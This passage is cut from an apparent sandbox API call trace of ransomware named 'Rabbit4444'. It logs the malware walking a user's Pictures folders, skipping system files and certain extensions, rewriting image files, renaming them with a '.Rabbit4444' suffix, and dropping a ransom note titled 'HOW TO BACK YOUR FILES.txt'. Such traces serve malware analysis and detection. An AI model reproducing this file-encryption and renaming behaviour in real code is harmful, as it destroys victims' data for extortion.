lpString2=".lnk") returned -1 [0048.856] lstrlenW (lpString=".ini") returned 4 [0048.856] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.856] lstrlenW (lpString=".sys") returned 4 [0048.856] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YGhL_kMC_eqFIP.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yghl_kmc_eqfip.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.857] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.857] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14016732079) returned 1 [0048.857] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75054) returned 1 [0048.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0048.857] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12830, lpName=0x0) returned 0x298 [0048.857] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12830) returned 0x70000 [0048.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.859] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14016997749) returned 1 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0048.859] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.860] CloseHandle (hObject=0x298) returned 1 [0048.860] CloseHandle (hObject=0x278) returned 1 [0048.862] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\YGhL_kMC_eqFIP.gif.Rabbit4444") returned 54 [0048.862] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\YGhL_kMC_eqFIP.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yghl_kmc_eqfip.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\YGhL_kMC_eqFIP.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\yghl_kmc_eqfip.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.863] InterlockedExchangeAdd (in: Addend=0xff618, Value=75056 | out: Addend=0xff618) returned 18669392 [0048.863] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3441 [0048.863] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6341280, ftCreationTime.dwHighDateTime=0x1d4c718, ftLastAccessTime.dwLowDateTime=0x555c75c0, ftLastAccessTime.dwHighDateTime=0x1d4cbbc, ftLastWriteTime.dwLowDateTime=0x555c75c0, ftLastWriteTime.dwHighDateTime=0x1d4cbbc, nFileSizeHigh=0x0, nFileSizeLow=0xa19e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ykv5 pVyi.bmp", cAlternateFileName="YKV5PV~1.BMP")) returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="Rabbit4444.exe") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2=".") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="..") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="windows") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="bootmgr") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="pagefile.sys") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="boot") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="ids.txt") returned 1 [0048.863] lstrcmpiW (lpString1="ykv5 pVyi.bmp", lpString2="NTUSER.DAT") returned 1 [0048.863] lstrcpyW (in: lpString1=0x130eb6a, lpString2="ykv5 pVyi.bmp" | out: lpString1="ykv5 pVyi.bmp") returned="ykv5 pVyi.bmp" [0048.863] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ykv5 pVyi.bmp", dwFileAttributes=0x0) returned 1 [0048.863] lstrlenW (lpString="ykv5 pVyi.bmp") returned 13 [0048.863] lstrlenW (lpString="Rabbit4444") returned 10 [0048.863] lstrcmpiW (lpString1="5 pVyi.bmp", lpString2="Rabbit4444") returned -1 [0048.864] lstrlenW (lpString=".dll") returned 4 [0048.864] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.864] lstrlenW (lpString=".lnk") returned 4 [0048.864] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.864] lstrlenW (lpString=".ini") returned 4 [0048.864] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.864] lstrlenW (lpString=".sys") returned 4 [0048.864] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.864] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ykv5 pVyi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ykv5 pvyi.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.864] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.864] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14017461444) returned 1 [0048.864] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41374) returned 1 [0048.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0048.864] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa4a0, lpName=0x0) returned 0x298 [0048.864] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa4a0) returned 0x70000 [0048.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.866] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14017656705) returned 1 [0048.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0048.866] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.867] CloseHandle (hObject=0x298) returned 1 [0048.867] CloseHandle (hObject=0x278) returned 1 [0048.868] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\ykv5 pVyi.bmp.Rabbit4444") returned 49 [0048.868] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\ykv5 pVyi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ykv5 pvyi.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\ykv5 pVyi.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ykv5 pvyi.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.869] InterlockedExchangeAdd (in: Addend=0xff618, Value=41376 | out: Addend=0xff618) returned 18744448 [0048.869] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3443 [0048.869] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1fb26d0, ftCreationTime.dwHighDateTime=0x1d4d28f, ftLastAccessTime.dwLowDateTime=0xf7ba41f0, ftLastAccessTime.dwHighDateTime=0x1d4cead, ftLastWriteTime.dwLowDateTime=0xf7ba41f0, ftLastWriteTime.dwHighDateTime=0x1d4cead, nFileSizeHigh=0x0, nFileSizeLow=0xae5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOcAT3Ep59x.jpg", cAlternateFileName="YOCAT3~1.JPG")) returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="Rabbit4444.exe") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2=".") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="..") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="windows") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="bootmgr") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="pagefile.sys") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="boot") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="ids.txt") returned 1 [0048.869] lstrcmpiW (lpString1="yOcAT3Ep59x.jpg", lpString2="NTUSER.DAT") returned 1 [0048.869] lstrcpyW (in: lpString1=0x130eb6a, lpString2="yOcAT3Ep59x.jpg" | out: lpString1="yOcAT3Ep59x.jpg") returned="yOcAT3Ep59x.jpg" [0048.869] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yOcAT3Ep59x.jpg", dwFileAttributes=0x0) returned 1 [0048.870] lstrlenW (lpString="yOcAT3Ep59x.jpg") returned 15 [0048.870] lstrlenW (lpString="Rabbit4444") returned 10 [0048.870] lstrcmpiW (lpString1="3Ep59x.jpg", lpString2="Rabbit4444") returned -1 [0048.870] lstrlenW (lpString=".dll") returned 4 [0048.870] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.870] lstrlenW (lpString=".lnk") returned 4 [0048.870] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.870] lstrlenW (lpString=".ini") returned 4 [0048.870] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.870] lstrlenW (lpString=".sys") returned 4 [0048.870] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.870] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yOcAT3Ep59x.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\yocat3ep59x.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.870] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.870] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14018076335) returned 1 [0048.870] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=44638) returned 1 [0048.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0048.870] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb160, lpName=0x0) returned 0x298 [0048.870] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb160) returned 0x70000 [0048.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.873] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.873] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14018329790) returned 1 [0048.873] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.873] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0048.873] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.873] CloseHandle (hObject=0x298) returned 1 [0048.873] CloseHandle (hObject=0x278) returned 1 [0048.875] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\yOcAT3Ep59x.jpg.Rabbit4444") returned 51 [0048.875] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\yOcAT3Ep59x.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\yocat3ep59x.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\yOcAT3Ep59x.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\yocat3ep59x.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.876] InterlockedExchangeAdd (in: Addend=0xff618, Value=44640 | out: Addend=0xff618) returned 18785824 [0048.876] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3444 [0048.876] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1fb26d0, ftCreationTime.dwHighDateTime=0x1d4d28f, ftLastAccessTime.dwLowDateTime=0xf7ba41f0, ftLastAccessTime.dwHighDateTime=0x1d4cead, ftLastWriteTime.dwLowDateTime=0xf7ba41f0, ftLastWriteTime.dwHighDateTime=0x1d4cead, nFileSizeHigh=0x0, nFileSizeLow=0xae5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOcAT3Ep59x.jpg", cAlternateFileName="YOCAT3~1.JPG")) returned 0 [0048.876] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0048.876] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.876] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.878] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.878] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.879] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.879] CloseHandle (hObject=0x278) returned 1 [0048.879] CloseHandle (hObject=0x27c) returned 1 [0048.880] GetCurrentThreadId () returned 0xd98 [0048.880] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0048.880] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0048.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d3f8 | out: hHeap=0xe0000) returned 1 [0048.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0048.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0048.880] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\" [0048.880] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3" [0048.880] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.881] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.884] FlushFileBuffers (hFile=0x27c) returned 1 [0048.885] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.886] CloseHandle (hObject=0x27c) returned 1 [0048.886] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned 39 [0048.886] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.886] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6755e57, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0048.886] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.886] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.886] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.886] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.886] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6755e57, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.887] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.887] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.887] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.887] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.887] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.887] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6755e57, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6755e57, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6755e57, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.887] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.887] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.887] lstrcpyW (in: lpString1=0x130eb88, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.887] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", dwFileAttributes=0x2) returned 1 [0048.887] lstrlenW (lpString="desktop.ini") returned 11 [0048.887] lstrlenW (lpString="Rabbit4444") returned 10 [0048.887] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.887] lstrlenW (lpString=".dll") returned 4 [0048.887] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.887] lstrlenW (lpString=".lnk") returned 4 [0048.887] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.887] lstrlenW (lpString=".ini") returned 4 [0048.888] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.888] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0048.888] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0048.888] lstrcpyW (in: lpString1=0x130eb88, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.888] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.904] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.904] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.904] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.904] CloseHandle (hObject=0x278) returned 1 [0048.904] CloseHandle (hObject=0x27c) returned 1 [0048.905] GetCurrentThreadId () returned 0xd98 [0048.906] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0048.906] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", iMaxLength=2048 | out: 